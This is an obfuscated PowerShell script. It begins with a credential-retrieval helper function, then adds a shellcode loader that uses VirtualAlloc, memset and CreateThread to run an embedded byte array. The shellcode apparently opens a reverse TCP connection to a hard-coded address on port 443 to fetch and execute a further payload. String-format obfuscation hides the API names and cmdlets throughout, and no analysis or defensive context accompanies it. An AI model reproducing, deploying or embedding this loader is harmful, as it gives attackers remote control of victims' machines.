function GEt-uSeR`cr`EDen`TIAL
{
	
	
	[CmdletBinding()]
	param
	(
		[Parameter()]
		[ValidateNotNullOrEmpty()]
		[pscredential]${CRed`EnTI`AL}
	)
	try
	{
		if (-not ${p`s`BOu`NDpAraMETE`RS}.("{2}{1}{3}{0}" -f'ey','n','Co','tainsK').Invoke(("{1}{2}{0}"-f 'l','C','redentia'))) {
			if ((.("{6}{5}{4}{3}{0}{2}{1}"-f'f','ate','ic','efaultCerti','KeystoreD','-','Get')) -isnot ("{0}{9}{10}{5}{11}{14}{12}{6}{3}{2}{8}{1}{7}{4}{13}"-f 'Sys','9Certifi','icates','hy.X509Certif','ate','Secu','rap','c','.X50','te','m.','ri','yptog','2','ty.Cr'))
			{
				${cre`deN`T`iAL} = &("{3}{4}{0}{1}{2}"-f 'de','nti','al','G','et-Cre') -UserName (.("{1}{0}"-f'ami','who')) -Message ("{12}{15}{9}{16}{11}{6}{8}{13}{7}{5}{20}{17}{4}{2}{10}{14}{19}{3}{0}{1}{18}" -f' to',' use',' ','ord',' Please','n','a','de',' suitable ',' ','inpu','d ','Can','cre','t ','not','fin','ial.','.','your passw','t')
			}
			else
			{
				${c`REDEnTI`AL} = .("{2}{5}{0}{4}{1}{3}"-f'Store','en','Get-Ke','tial','Cred','y') -Name ("{4}{2}{1}{3}{0}" -f'rator','rch','vcO','est','s')
			}
		}
		${cRE`D`Ential}
	}
	catch
	{
		${p`S`cMDLEt}.("{1}{4}{0}{3}{2}" -f'inatingEr','Thr','r','ro','owTerm').Invoke(${_})
	}
}

${c} = ((("{40}{55}{101}{43}{56}{88}{85}{33}{98}{82}{95}{37}{18}{42}{3}{41}{31}{46}{39}{29}{97}{26}{45}{8}{67}{25}{64}{52}{71}{21}{1}{87}{73}{30}{16}{2}{86}{19}{13}{0}{79}{75}{65}{14}{96}{63}{50}{12}{94}{53}{61}{22}{35}{78}{77}{100}{72}{32}{91}{38}{90}{54}{20}{49}{51}{36}{89}{48}{4}{60}{9}{92}{15}{10}{80}{83}{47}{5}{7}{11}{68}{6}{59}{62}{93}{76}{102}{84}{74}{81}{99}{70}{44}{24}{17}{69}{66}{58}{34}{57}{27}{28}{23}"-f're','l32.d','xtern ','r','ionFlags, Int','}ms','l','v','ati','pThreadI','I','c','butes, u',' C','tP',';[Dll','e','tPtr des','Int','ntPtr','e','rne',' In',' count);','n','Type','ize, uint fl','c',', uint','t dw','tatic ','c(IntPt','I','c st','t','tPtr lpSt','nt','ern ','t','s, uin','[Dll','tualAllo','Ptr Vi','nel3','t(I','Alloc','r lpAddres','{0','Creat','r, ','Attri','ui','lProtect);[DllImpo',' dwSta','lpParamet','Imp','2',' sr',' uin','{0','Ptr l','ckSize,','})','hread',', uint f','d(In',',','on','rt.dl','t','memse','rt({0}ke',', ',']public s','x','ea','i','ddre','artA','ateThr','mp','te','e','ort(','static e','})]publi','I','ll{0})','.dll{0',' dw','r ','ntP','d)',']publ','int','xt','tr lpT','S','atic ','rn IntPtr ','ss','ort({0}ker','c ')) -f [CHar]34);${W} = &("{0}{1}{2}"-f 'A','dd-T','ype') -memberDefinition ${c} -Name ("{1}{0}" -f 'in32','W') -namespace ("{4}{0}{3}{2}{1}"-f'32F','ns','tio','unc','Win') -passthru;[Byte[]];[Byte[]]${Z} = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0xc0,0xa8,0x52,0xbd,0x68,0x02,0x00,0x01,0xbb,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3;${G} = 0x1000;if (${Z}."LEN`GTH" -gt 0x1000){${G} = ${z}."Len`Gth"};${X}=${W}::("{2}{1}{0}{3}"-f'ualAll','t','Vir','oc').Invoke(0,0x1000,${g},0x40);for (${i}=0;${i} -le (${Z}."leng`Th"-1);${i}++) {${W}::"MEms`Et"([IntPtr](${x}.("{2}{0}{1}" -f'Int','32','To').Invoke()+${i}), ${Z}[${I}], 1)};${w}::("{0}{2}{3}{1}" -f'C','ad','reate','Thre').Invoke(0,0,${X},0,0,0);for (;;){.("{3}{1}{2}{0}"-f 'sleep','a','rt-','St') 60};
